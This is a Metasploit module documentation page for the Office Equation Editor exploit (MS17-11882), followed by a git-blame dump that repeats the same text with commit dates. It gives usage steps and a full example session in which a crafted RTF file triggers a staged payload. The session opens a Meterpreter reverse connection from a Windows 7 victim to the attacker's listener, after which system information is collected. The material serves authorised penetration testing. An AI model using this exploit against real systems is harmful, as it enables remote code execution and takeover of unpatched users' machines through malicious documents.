documentation/modules/exploit/windows/fileformat/office_ms17_11882.md

## Introduction

Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.

## Vulnerable Application

- Microsoft Office 2016
- Microsoft Office 2013 Service Pack 1
- Microsoft Office 2010 Service Pack 2
- Microsoft Office 2007

## Verification Steps

1. Start msfconsole
2. Do: `use exploit/windows/fileformat/office_ms17_11882`
3. Do: `set PAYLOAD [PAYLOAD]`
4. Do: `run`


## Options
### FILENAME
Filename to output & if injecting a file, the file to inject

### FOLDER_PATH
Path to filename to inject


## Example

```
msf > use exploit/windows/fileformat/office_ms17_11882
msf exploit(office_ms17_11882) > set FILENAME msf.rtf
FILENAME => /home/mumbai/file.rtf
msf exploit(office_ms17_11882) > set LHOST ens3
LHOST => ens3
msf exploit(office_ms17_11882) > set LPORT 35116
LPORT => 35116
msf exploit(office_ms17_11882) > run
[*] Using URL: http://0.0.0.0:8080/BUY0DYgc
[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc
[*] Server started.
[*] 192.168.0.24     office_ms17_11882 - Handling initial request from 192.168.0.24
[*] 192.168.0.24     office_ms17_11882 - Stage two requested, sending
[*] Sending stage (205379 bytes) to 192.168.0.24
[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : TEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >
```
Add intro header to office_ms17_11882 2018-02-02 14:12:36 -05:00			`## Introduction`
fix documentation 2017-12-04 16:41:27 -05:00
			`Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.`
Create office_ms17_11882.md 2017-11-21 14:45:56 -05:00
remove s from application 2020-01-16 11:45:10 -05:00			`## Vulnerable Application`
Create office_ms17_11882.md 2017-11-21 14:45:56 -05:00
			`- Microsoft Office 2016`
			`- Microsoft Office 2013 Service Pack 1`
			`- Microsoft Office 2010 Service Pack 2`
			`- Microsoft Office 2007`

			`## Verification Steps`

			`1. Start msfconsole`
			2. Do: `use exploit/windows/fileformat/office_ms17_11882`
			3. Do: `set PAYLOAD [PAYLOAD]`
			4. Do: `run`

Add intro header to office_ms17_11882 2018-02-02 14:12:36 -05:00
Create office_ms17_11882.md 2017-11-21 14:45:56 -05:00			`## Options`
			`### FILENAME`
missing docs on options 2017-12-04 20:58:36 -05:00			`Filename to output & if injecting a file, the file to inject`

			`### FOLDER_PATH`
			`Path to filename to inject`
Create office_ms17_11882.md 2017-11-21 14:45:56 -05:00

			`## Example`

			```
			`msf > use exploit/windows/fileformat/office_ms17_11882`
fix documentation 2017-12-04 16:41:27 -05:00			`msf exploit(office_ms17_11882) > set FILENAME msf.rtf`
Create office_ms17_11882.md 2017-11-21 14:45:56 -05:00			`FILENAME => /home/mumbai/file.rtf`
			`msf exploit(office_ms17_11882) > set LHOST ens3`
			`LHOST => ens3`
			`msf exploit(office_ms17_11882) > set LPORT 35116`
			`LPORT => 35116`
			`msf exploit(office_ms17_11882) > run`
fix documentation 2017-12-04 16:41:27 -05:00			`[*] Using URL: http://0.0.0.0:8080/BUY0DYgc`
			`[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc`
Create office_ms17_11882.md 2017-11-21 14:45:56 -05:00			`[*] Server started.`
			`[*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24`
spelling fixes on docs 2023-10-10 14:46:18 -04:00			`[*] 192.168.0.24 office_ms17_11882 - Stage two requested, sending`
Create office_ms17_11882.md 2017-11-21 14:45:56 -05:00			`[*] Sending stage (205379 bytes) to 192.168.0.24`
			`[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500`
			`sessions -i 1`
			`[*] Starting interaction with 1...`

			`meterpreter > sysinfo`
			`Computer : TEST-PC`
			`OS : Windows 7 (Build 7601, Service Pack 1).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 1`
			`Meterpreter : x64/windows`
			`meterpreter >`
			```